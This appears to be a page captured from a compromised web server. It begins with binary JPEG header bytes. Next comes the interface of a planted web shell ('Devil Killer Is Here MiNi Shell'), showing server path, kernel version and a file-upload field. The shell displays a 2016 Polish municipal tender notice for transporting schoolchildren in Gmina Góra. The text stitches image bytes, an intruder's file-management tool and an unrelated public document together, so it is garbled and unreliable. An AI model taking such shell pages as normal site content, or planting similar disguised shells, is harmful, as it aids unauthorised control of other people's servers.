JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/129372-N-2016.html

<p class="kh_header"><b>Góra: ,,Organizacja dowozu dzieci do placówek oświatowych,,</b><br>
<b>Numer ogłoszenia: 129372 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Góra , ul. Mickiewicza 1, 56-200 Góra, woj. dolnośląskie, tel. 065 5443644, faks 065/543-26-58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gora.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ,,Organizacja dowozu dzieci do placówek oświatowych,,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi, polegające na przewozach dzieci i młodzieży szkolnej z terenu gminy Góra wraz z opiekunami, do placówek oświatowych zlokalizowanych na obszarze gminy Góra i gminy Wąsosz* (*dowóz dzieci niepełnosprawnych do Specjalnego Ośrodka Szkolno-Wychowawczego w Wąsoszu) wraz z odwozem po zakończonych zajęciach szkolnych do miejsc zamieszkania. 
Dowozy i odwozy będą odbywać się z/do wyznaczonych miejsc przystankowych. 
Zamawiający zapewnia osoby sprawujące opiekę nad dziećmi w trakcie przejazdów - 1 opiekun na każdy pojazd (szacunkowo 11 osób). 

Przedmiot zamówienia podzielono na dwie części:
Część 1- dowozy dzieci do placówek oświatowych na podstawie biletów miesięcznych szkolnych w okresie od 01 września 2016 r. do 31 grudnia 2016 r. na utworzonych przez Wykonawcę liniach regularnych.
Część 2- dowozy dzieci do placówek oświatowych w okresie od 02 stycznia do 2017 r. do 30 czerwca 2017 r. na  trasach wyznaczonych przez Wykonawcę wg ustalonego rozkładu jazdy stanowiącego załącznik nr 1 B do SIWZ. 

Wykonawca może złożyć ofertę w każdej z części postępowania, z zastrzeżeniem, że oferty należy złożyć odrębnie na część 1 i część 2.

3.1.1. Zakres CZĘŚCI I - dowozy dzieci do placówek oświatowych na podstawie biletów miesięcznych szkolnych w okresie od 01 września 2016 r. do 31 grudnia 2016 r. na utworzonych przez Wykonawcę liniach regularnych:

1.  Przewozy będą świadczone w I semestrze roku szkolnego 2016/2017, okresie od 01 września 2016 r. do 31 grudnia 2016 r., we wszystkie dni nauki szkolnej, tj. w dni powszednie z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie przepisów Rozporządzenia Ministerstwa Edukacji Narodowej i Sportu z dnia 18.04 2002 r. w sprawie organizacji roku szkolnego (Dz. U z 2002 r. nr 46 poz. 432 z późn. zm.)  na utworzonych przez Wykonawcę liniach regularnych, z pierwszeństwem przejazdu dzieci i młodzieży z imiennym, szkolnym biletem miesięcznym oraz opiekunów z biletem miesięcznym (cena biletów zostanie ustalona w niniejszym postępowaniu). 
2.  Prognozowana łączna liczba uczniów dojeżdżających co miesiąc do placówek oświatowych wynosi: 569, szacunkowa liczba opiekunów:11.
3. Przedmiot zamówienia obejmuje dowóz uczniów wraz z opiekunami do niżej wskazanych placówek oświatowych, a także odwóz do miejsca zamieszkania po zakończeniu zajęć:
a) Szkoła Podstawowa nr 1 im. Bolesława Prusa w Górze - ul. M. Konopnickiej 2, ul. Piastów nr 34;
b) Szkoła Podstawowa nr 3 im. Władysława Broniewskiego w Górze - ul. Poznańska 2, ul. Podwale 20;
c) Gimnazjum nr 1 im. Marii Skłodowskiej - Curie w Górze -ul. Szkolna 2;
d) Gimnazjum nr 2 im. Mikołaja Kopernika w Górze - ul. Poznańska 2a;
e) Przedszkole Publiczne nr 1 w Górze im. Marii Konopnickiej, ul. Żeromskiego 15;
f) Przedszkole Publiczne nr 3 w Górze im. Jasia i Małgosi - ul. Piastów 7, oddział Stara Góra 15; 
g) Zespół Szkoła Podstawowa i Przedszkole im. Władysława Reymonta w Witoszycach - Witoszyce 10;
h) Zespół Szkolno - Przedszkolny z Oddziałami Integracyjnymi im. 55 Poznańskiego Pułku Piechoty 
    w Glince, - Glinka 6;
i) Zespół Szkoła Podstawowa, Gimnazjum i Przedszkole im. św. Huberta w Czerninie - ul. Szkolna 2;
j) Zespół Szkoła Podstawowa i Przedszkole im. Janusza Korczaka w Ślubowie- Ślubów 25 i 54;
k) Specjalny Ośrodek Szkolno-Wychowawczy w Wąsoszu (dzieci niepełnosprawne)- ul. Korczaka 6
 (dowóz do SOSW w Wąsoszu dzieci posiadających orzeczenie o niepełnosprawności).
Szczegółowy wykaz szkół stanowi załącznik nr 1A do SIWZ oraz wykaz ilościowy dzieci wg poszczególnych miejscowości załącznik nr 1 D do SIWZ.
4. Usługa obejmuje dowozy dzieci z terenu gminy Góra (z wyznaczonych miejsc przystankowych) wraz z opiekunami (jeden opiekun na każdy pojazd), do placówek oświatowych zlokalizowanych na obszarze gminy Góra i gminy Wąsosz* (*dowóz dzieci niepełnosprawnych do Specjalnego Ośrodka Szkolno-Wychowawczego w Wąsoszu). Zamówienie obejmuje również odwiezienie dzieci wraz z opiekunami po zakończeniu zajęć szkolnych do miejsca zamieszkania (do wyznaczonych miejsc przystankowych).
5.Zamawiający, we własnym zakresie zapewni dla przewożonych dzieci jednego opiekuna na każdy pojazd Wykonawcy. Szacunkowa liczba opiekunów: 11 osób.
6.Wykonawca zobligowany jest do uzyskania wszelkich niezbędnych zezwoleń dla świadczenia usług objętych przedmiotem zamówienia. 
7.Wykonawca wystawiać będzie dla przewożonych dzieci bilety miesięczne szkolne ulgowe zgodnie z ustawą z dnia 20 czerwca 1992 roku o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (t.j. Dz. U. z 2012 r., poz. 1138 z późn. zm.).
8.Wykonawca zobowiązany jest do uzyskania wszystkich zezwoleń wynikających z przepisów prawa, niezbędnych do świadczenia usług objętych przedmiotem umowy na co najmniej 7 dni przed rozpoczęciem ich świadczenia. Wykonawca winien spełniać wszystkie warunki niezbędne do otrzymania dopłat przysługujących przewoźnikom wykonującym regularne przewozy osób, zgodnie z ustawą o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (t. j. Dz. U. z 2012 r., poz. 1138 z późn. zm.). 
9. Imienna lista uczniów, dla których zostaną zakupione bilety szkolne ulgowe (z podziałem na poszczególne placówki oświatowe i miejscowości) zostanie podana do wiadomości Wykonawcy przez Zamawiającego do 20 dnia każdego miesiąca, poprzedzającego miesiąc na który bilety zostaną zakupione, w formie pisemnej. Dopuszcza się przekazanie listy za pomocą faksu lub poczty elektronicznej z niezwłocznym potwierdzeniem pisemnym.
10. Przekazywane listy w stosunku do oferty  mogą różnić się ilością dzieci dowożonych, która mogła ulec zmianie w stosunku do ilości przedstawionej w ofercie. Ilość dzieci może ulegać w okresach miesięcznych zwiększeniu bądź zmniejszeniu ze względu na migrację ludności. W przypadku zmiany ilości dzieci dojeżdżających Wykonawca dostosuje trasy i liczbę kursów do potrzeb sprawnego dowozu dzieci do placówek na warunkach podanych w ofercie. Z tytułu zmniejszenia ilości dowożonych uczniów Zamawiający nie przewiduje ponoszenia dodatkowych opłat, a Wykonawca nie będzie rościł pretensji ani żądał rekompensaty finansowej, jeżeli wartość zamówienia będzie mniejsza niż szacowana przez Zamawiającego.
10.1. Zamawiający zastrzega sobie prawo do zwrócenia biletów już zakupionych najpóźniej do 5 dnia miesiąca na który zostały zakupione, bez ponoszenia kosztu ich zakupu. 	            
10.2. Wykonawca zobowiązany jest przekazać bilety:
a) dla dzieci - dyrektorom poszczególnych placówek oświatowych najpóźniej na 5 dni przed rozpoczęciem każdego miesiąca,
b) dla opiekunów - do siedziby Zamawiającego, tj. Urzędu Miasta i Gminy Góra, pok. nr 4-5 najpóźniej na 5 dni przed rozpoczęciem każdego miesiąca. 
11. Szczegółowe informacje zawarto w załącznikach:
1A -  wykaz ilościowy dzieci wg poszczególnych miejscowości i placówek oświatowych, 
1B - przykładowy rozkład dowozu i odwozu,
1C - godziny rozpoczęcia i zakończenia zajęć w placówkach oświatowych,
1D - wykaz uczniów wg miejscowości,
12.Wykonawca zobowiązany jest do ścisłego stosowania się do godzin dowozu i odwozu ustalonych w rozkładzie dowozu i odwozu i zatrzymywania się w wyznaczonych miejscach, z zastrzeżeniem że dzieci muszą być dowiezione do szkół najpóźniej na 5 minut przed rozpoczęciem zajęć lekcyjnych i nie wcześniej niż 40 minut przed rozpoczęciem zajęć lekcyjnych.
13. Zamawiający zastrzega, że okres oczekiwania dzieci na odwóz do miejsc zamieszkania (wyznaczonych miejsc przystankowych) po zakończonych zajęciach nie będzie dłuższy niż 1 godzina. 
14. Kierowca pojazdu będzie informował dzieci, na którym przystanku się aktualnie znajdują.
15. Zamawiający zastrzega sobie możliwość odstępstw od podanego rozkładu dowozów i odwozów, stanowiącego załącznik do SIWZ i umowy, z powodu zmiany planu lekcji, ilości dzieci, likwidacji szkół, zmiany organizacji roku szkolnego, odpracowania dni wolnych, itp. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć Wykonawca zobowiązany jest zapewnić przewóz zgodnie z rozkładem jazdy ustalonym przez Zamawiającego. Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkład dowozów i odwozów, w szczególności przed rozpoczęciem roku szkolnego, po powiadomieniu Wykonawcy w terminie co najmniej 7 dni przed dniem, w którym nastąpi zmiana.
16. Zmiany w rozkładzie jazdy oraz ilości dzieci/młodzieży szkolnej dla których wystawiane są bilety szkolne w danym miesiącu możliwe są na podstawie pisemnego zatwierdzenia przez Zamawiającego. 
17. Wykonawca winien posiadać odpowiednią ilość sprawnych technicznie pojazdów (szczególną uwagę należy zwrócić na instalację grzewczą w okresie zimowym) zdolnych do przewiezienia dzieci i opiekunów dowożonych na danej trasie ( szacunkową ilość wskazano w zał. nr 1 A i 1 D do SIWZ). Przy dowożeniu kursami ogólnodostępnymi Wykonawca musi uruchomić w razie potrzeby dodatkowe kursy, aby zapewnić dzieciom bezpieczne i higieniczne  warunki w czasie dowozu. Wykonawca zobowiązuje się do utrzymania taboru w wielkości umożliwiającej prawidłowe wykonanie umowy oraz że usługi będą świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej spełniającymi wszystkie wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.                                   
18. Wykonawca zobligowany jest zapewnić wszystkim przewożonym uczniom miejsca siedzące.   
19. W razie uszkodzenia lub awarii pojazdu wykonującego przewóz, Wykonawca zobowiązuje się podstawić sprawny technicznie zastępczy pojazd w ciągu maksymalnie 90 minut. Jest to termin maksymalny. Jego skrócenie będzie premiowane w ramach kryteriów oceny ofert.
20. Wykonawca jest obowiązany posiadać aktualne badania techniczne i ubezpieczenia OC pojazdów uczestniczących w dowozach oraz zobligowany jest ubezpieczyć również przewożone w ramach umowy osoby od następstw nieszczęśliwych wypadków. Polisy ubezpieczenia Wykonawca przedkłada na wezwanie Zamawiającego.
21. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna, spowodowana działalnością Wykonawcy. Wykonawca ponosi pełną odpowiedzialność za szkody wynikające z wypadków lub innych zdarzeń wynikłych w czasie realizacji usługi stanowiącej przedmiot umowy, dlatego Wykonawca oświadcza, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości co najmniej odpowiadającej wartości całkowitego wynagrodzenia Wykonawcy wskazanego w niniejszej umowie. Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu osób. 
22. Wykonawca na wezwanie Zamawiającego przedkłada dokumenty potwierdzające posiadanie ubezpieczenia odpowiedzialności OC w zakresie prowadzonej działalności. 
23.Wykonawca nie bierze żadnej odpowiedzialności za dzieci/młodzież, które nie stawią się w oznaczonej godzinie w miejscu przystanku lub postoju pojazdu.
24. Wykonawca zapozna się ze stanem dróg, na których realizowane będą przewozy. Trasa powinna przebiegać możliwie najkrótszą drogą.
25.  Wykonawca zobowiązany jest do przestrzegania zakazu palenia w pojeździe.
26.Wykonanie przedmiotu umowy winno być zgodne z przepisami prawa, w szczególności z:
a)	ustawą z dnia 15 listopada 1984 r. Prawo przewozowe (t.j. Dz. U. z 2015 r., poz. 915), 
b)	ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2013 r., poz. 1414 z późn. zm.), 
c)	ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r., poz. 1137 z późn. zm.),
d)	ustawą z dnia 16 grudnia 2010 r. o publicznym transporcie zbiorowym. (t.j. Dz. U. z 2015 r., poz. 1440 z póżn. zm.)
e)	ustawą z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (t.j. Dz. U. z 2012 r., poz. 1138 z późn. zm.).

27.Zaleca się wykonawcom bardzo dokładne zapoznanie się z warunkami wykonywania przedmiotu zamówienia w celu prawidłowego oszacowania przez Wykonawcę kosztów i ryzyka usługi, oraz uzyskania i zweryfikowania wszelkich danych jakie mogą być niezbędne w przygotowaniu oferty 
i podpisaniu umowy na wykonanie przedmiotu zamówienia.
28.Świadczona usługa będzie wykonywana zgodnie z warunkami przedmiotowej Specyfikacji Istotnych Warunków Zamówienia oraz umową stanowiącą załącznik do niniejszej SIWZ.

3.1.2. Zakres CZĘŚCI II  - dowozy dzieci do placówek oświatowych w okresie od 02 stycznia 2017 r. do 30 czerwca 2017 r. na  trasach wyznaczonych przez Wykonawcę wg ustalonego rozkładu jazdy stanowiącego załącznik nr 1 B do SIWZ. 

1. Przewozy będą świadczone w II semestrze w roku szkolnym 2016/2017, okresie od 02 stycznia 2017 r. do 30 czerwca 2017 r., we wszystkie dni nauki szkolnej., tj. w dni powszednie z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie przepisów Rozporządzenia Ministerstwa Edukacji Narodowej i Sportu z dnia 18.04 2002 r. w sprawie organizacji roku szkolnego (Dz. U z 2002 r. nr 46 poz. 432 z późn. zm.)  na wyznaczonych trasach dostosowanych do ustalonego rozkładu jazdy. Trasa powinna przebiegać możliwie najkrótszą, optymalną drogą. Przykładowy rozkład jazdy zawiera zał. nr 1B. 
2. Prognozowana łączna liczba uczniów dojeżdżających co miesiąc do placówek oświatowych wynosi: 569, szacunkowa liczba opiekunów:11, szacunkowa liczba kilometrów w okresie realizacji umowy: 108 476,50 km. 
2.1. Faktyczna ilość kilometrów będzie uzależniona od ustalonej przez Wykonawcę trasy. Trasa powinna przebiegać możliwie najkrótszą, optymalną drogą, dostosowaną do rozkładu zajęć. Wykonawca winien uzgodnić przebieg trasy w porozumieniu z Zamawiającym, a także wskazać rzeczywiste długości tras/odcinków w km. 
3. Przedmiot zamówienia obejmuje dowóz uczniów wraz z opiekunami do niżej wskazanych placówek oświatowych, a także odwóz do miejsca zamieszkania po zakończeniu zajęć:
a) Szkoła Podstawowa nr 1 im. Bolesława Prusa w Górze - ul. M. Konopnickiej 2, ul. Piastów nr 34;
b) Szkoła Podstawowa nr 3 im. Władysława Broniewskiego w Górze - ul. Poznańska 2, ul. Podwale 20;
c) Gimnazjum nr 1 im. Marii Skłodowskiej - Curie w Górze -ul. Szkolna 2;
d) Gimnazjum nr 2 im. Mikołaja Kopernika w Górze - ul. Poznańska 2a;
e) Przedszkole Publiczne nr 1 w Górze im. Marii Konopnickiej, ul. Żeromskiego 15;
f) Przedszkole Publiczne nr 3 w Górze im. Jasia i Małgosi - ul. Piastów 7, oddział Stara Góra 15; 
g) Zespół Szkoła Podstawowa i Przedszkole im. Władysława Reymonta w Witoszycach - Witoszyce 10;
h) Zespół Szkolno - Przedszkolny z Oddziałami Integracyjnymi im. 55 Poznańskiego Pułku Piechoty 
    w Glince, - Glinka 6;
i) Zespół Szkoła Podstawowa, Gimnazjum i Przedszkole im. św. Huberta w Czerninie - ul. Szkolna 2;
j) Zespół Szkoła Podstawowa i Przedszkole im. Janusza Korczaka w Ślubowie- Ślubów 25 i 54;
k) Specjalny Ośrodek Szkolno-Wychowawczy w Wąsoszu (dzieci niepełnosprawne)- ul. Korczaka 6
 (dowóz do SOSW w Wąsoszu dzieci posiadających orzeczenie o niepełnosprawności).
3.1. Szczegółowe informacje zawarto załącznikach:
1A -  wykaz ilościowy dzieci wg poszczególnych miejscowości i placówek oświatowych, 
       1B - przykładowy rozkład dowozu i odwozu, 
       1C - godziny rozpoczęcia i zakończenia zajęć w placówkach oświatowych,
       1D - wykaz uczniów wg miejscowości,
       1E - szacunkowa łączna liczba kilometrów.
4.Usługa obejmuje dowóz dzieci  z terenu gminy Góra (z wyznaczonych miejsc przystankowych) wraz z opiekunami (jeden opiekun na każdy pojazd), do placówek oświatowych zlokalizowanych na obszarze gminy Góra i gminy Wąsosz* (*dowóz dzieci niepełnosprawnych do Specjalnego Ośrodka Szkolno-Wychowawczego w Wąsoszu). Zamówienie obejmuje również odwiezienie dzieci wraz z opiekunami po zakończeniu zajęć szkolnych do miejsca zamieszkania (do wyznaczonych miejsc przystankowych). 
5.Zamawiający, we własnym zakresie zapewni dla przewożonych dzieci jednego opiekuna na każdy pojazd Wykonawcy. Szacunkowa liczba opiekunów: 11 osób.
6.Wykonawca zobligowany jest do uzyskania wszelkich niezbędnych zezwoleń dla świadczenia usług objętych przedmiotem zamówienia.
7.Ilość dzieci może ulegać w okresach miesięcznych zwiększeniu bądź zmniejszeniu ze względu na migrację ludności. W przypadku zmiany ilości dzieci dojeżdżających Wykonawca dostosuje trasy i liczbę kursów do potrzeb sprawnego dowozu dzieci do placówek na warunkach podanych w ofercie. Z tytułu zmniejszenia ilości dowożonych uczniów Zamawiający nie przewiduje ponoszenia dodatkowych opłat, a Wykonawca nie będzie rościł pretensji ani żądał rekompensaty finansowej, jeżeli wartość zamówienia będzie mniejsza niż szacowana przez Zamawiającego.
8.Wykonawca zobowiązany jest do ścisłego stosowania się do godzin dowozu i odwozu ustalonych w rozkładzie dowozu i odwozu i zatrzymywania się w wyznaczonych miejscach, z zastrzeżeniem że dzieci muszą być dowiezione do szkół najpóźniej na 5 minut przed rozpoczęciem zajęć lekcyjnych i nie wcześniej niż 40 minut przed rozpoczęciem zajęć lekcyjnych.
9.Zamawiający zastrzega, że okres oczekiwania dzieci na odwóz do miejsc zamieszkania (wyznaczonych miejsc przystankowych) po zakończonych zajęciach nie będzie dłuższy niż 1 godzina. 
10.Kierowca pojazdu będzie informował dzieci, na którym przystanku się aktualnie znajdują.
11.Zamawiający zastrzega sobie możliwość odstępstw od podanego rozkładu dowozów i odwozów, stanowiącego załącznik nr 1B do SIWZ i umowy, z powodu zmiany planu lekcji, ilości dzieci, likwidacji szkół, zmiany organizacji roku szkolnego, odpracowania dni wolnych, itp. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć Wykonawca zobowiązany jest zapewnić przewóz zgodnie z rozkładem jazdy ustalonym przez Zamawiającego. Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkład dowozów i odwozów, w szczególności przed rozpoczęciem roku szkolnego, po powiadomieniu Wykonawcy w terminie co najmniej 7 dni przed dniem, w którym nastąpi zmiana. O rezygnacji z kursu w danym dniu i trasie, Zamawiający powiadomi Wykonawcę co najmniej 1 dzień wcześniej przed takim zdarzeniem.
12.Zmiany w rozkładzie jazdy oraz ilości dzieci/młodzieży szkolnej w danym miesiącu możliwe są na podstawie pisemnego zatwierdzenia przez Zamawiającego. 
13.Wykonawca winien posiadać odpowiednią ilość sprawnych technicznie pojazdów (szczególną uwagę należy zwrócić na instalację grzewczą w okresie zimowym) zdolnych do przewiezienia dzieci i opiekunów dowożonych na danej trasie ( szacunkową ilość wskazano w zał. nr 1 A, 1B, 1 D do SIWZ). Wykonawca musi uruchomić w razie potrzeby dodatkowe kursy, aby zapewnić dzieciom bezpieczne i higieniczne  warunki w czasie dowozu. Wykonawca zobowiązuje się do utrzymania taboru w wielkości umożliwiającej prawidłowe wykonanie umowy oraz że usługi będą świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej spełniającymi wszystkie wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.                                   
14.Wykonawca zobligowany jest zapewnić wszystkim przewożonym uczniom miejsca siedzące.   
15.W razie uszkodzenia lub awarii pojazdu wykonującego przewóz, Wykonawca zobowiązuje się podstawić sprawny technicznie zastępczy pojazd w ciągu maksymalnie 90 minut. Jest to termin maksymalny. Jego skrócenie będzie premiowane w ramach kryteriów oceny ofert.
16. Wykonawca jest obowiązany posiadać aktualne badania techniczne i ubezpieczenia OC pojazdów uczestniczących w dowozach oraz zobligowany jest ubezpieczyć również przewożone w ramach umowy osoby od następstw nieszczęśliwych wypadków. Polisy ubezpieczenia Wykonawca przedkłada na wezwanie Zamawiającego.
17. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna, spowodowana działalnością Wykonawcy. Wykonawca ponosi pełną odpowiedzialność za szkody wynikające z wypadków lub innych zdarzeń wynikłych w czasie realizacji usługi stanowiącej przedmiot umowy, dlatego Wykonawca oświadcza, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości co najmniej odpowiadającej wartości całkowitego wynagrodzenia Wykonawcy wskazanego w niniejszej umowie. Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu osób. 
18.Wykonawca na wezwanie Zamawiającego przedkłada dokumenty potwierdzające posiadanie ubezpieczenia odpowiedzialności OC w zakresie prowadzonej działalności. 
19.Wykonawca nie bierze żadnej odpowiedzialności za dzieci/młodzież, które nie stawią się w oznaczonej godzinie w miejscu przystanku lub postoju pojazdu.
20. Wykonawca zapozna się ze stanem dróg, na których realizowane będą przewozy. Trasa powinna przebiegać możliwie najkrótszą drogą.
21. Wykonawca zobowiązany jest do przestrzegania zakazu palenia w pojeździe.
22. Wykonanie przedmiotu umowy winno być zgodne z przepisami prawa, w szczególności z:
a) ustawą z dnia 15 listopada 1984 r. Prawo przewozowe (t.j. Dz. U. z 2015 r., poz. 915), 
b) ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2013 r., poz. 1414 z późn. zm.), 
c) ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r., poz. 1137 z późn. zm.),
23.Zaleca się wykonawcom bardzo dokładne zapoznanie się z warunkami wykonywania przedmiotu zamówienia w celu prawidłowego oszacowania przez Wykonawcę kosztów i ryzyka usługi, oraz uzyskania i zweryfikowania wszelkich danych jakie mogą być niezbędne w przygotowaniu oferty 
i podpisaniu umowy na wykonanie przedmiotu zamówienia.
